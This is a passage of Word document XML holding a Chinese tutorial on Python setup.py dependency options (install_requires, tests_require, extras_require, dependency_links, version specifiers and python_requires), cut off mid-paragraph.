    <w:p w14:paraId="437B15B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>表明当前模块依赖哪些包，若环境中没有，则会从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pypi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中下载安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FC5C2D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    install_requires=['docutils&gt;=0.3'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63692215" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="534D6382" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # setup.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身要依赖的包，这通常是为一些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setuptools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的插件准备的配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEF50EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里列出的包，不会自动安装。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A00D171" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    setup_requires=['pbr'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6FB61C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64AA5D1C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仅在测试时需要使用的依赖，在正常发布的代码中是没有用的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C2EEA2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python setup.py test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，可以自动安装这三个库，确保测试的正常运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F49B989" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    tests_require=[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5F79D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        'pytest&gt;=3.3.1',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD1E200" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        'pytest-cov&gt;=2.5.1',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD82358" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D0BEDD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E36DA3D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setup_requires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tests_require</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里的软件包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695F013E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些信息会写入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>egg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> metadata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBF925E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    dependency_links=[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5F2119" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        "http://example2.com/p/foobar-1.0.tar.gz",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4885AD26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B506851" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66BEB946" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # install_requires </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在安装模块时会自动安装依赖包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD6A811" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> extras_require </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不会，这里仅表示该模块会依赖这些包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFA74C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>但是这些包通常不会使用到，只有当你深度使用模块时，才会用到，这里需要你手动安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195E157D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    extras_require={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496B1C2D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        'PDF':  ["ReportLab&gt;=1.2", "RXP"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D24B3EE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        'reST': ["docutils&gt;=0.3"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7417732C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AA444A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190A948A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45F13AD0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>关于install_requires，有以下五种常用的表示方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526A1EBE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C2A4F6A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'argparse'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，只包含包名。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种形式只检查包的存在性，不检查版本。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方便，但不利于控制风险。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E358109" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'setuptools==38.2.4'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，指定版本。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种形式把风险降到了最低，确保了开发、测试与部署的版本一致，不会出现意外。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缺点是不利于更新，每次更新都需要改动代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A3DC7C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'docutils &gt;= 0.3'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这是比较常用的形式。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当对某个库比较信任时，这种形式可以自动保持版本为最新。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4E4CF2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'Django &gt;= 1.11, != 1.11.1, &lt;= 2'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这是比较复杂的形式。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如这个例子，保证了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的大版本在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间，也即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.11.x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；并且，排除了已知有问题的版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.11.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（仅举例）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于一些大型、复杂的库，这种形式是最合适的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EAE031" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'requests[security, socks] &gt;= 2.18.4'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这是包含了额外的可选依赖的形式。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正常安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会自动安装它的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>install_requires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中指定的依赖，而不会安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>socks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这两组依赖。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这两组依赖是定义在它的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>extras_require</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种形式，用在深度使用某些库时。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A79071" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485D1452" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装环境限制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E15C64" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有些库并不是在所以的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本中都适用的，若一个库安装在一个未兼容的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境中，理论上不应该在使用时才报错，而应该在安装过程就使其失败，提示禁止安装。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A23090" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="662DBBAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样的功能，可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> python_requires </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来实现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03860B55" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="486D7ECA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setup(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA5ED17" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17855FCD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    python_requires='&gt;=2.7, &lt;=3',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B90A25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC72301" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
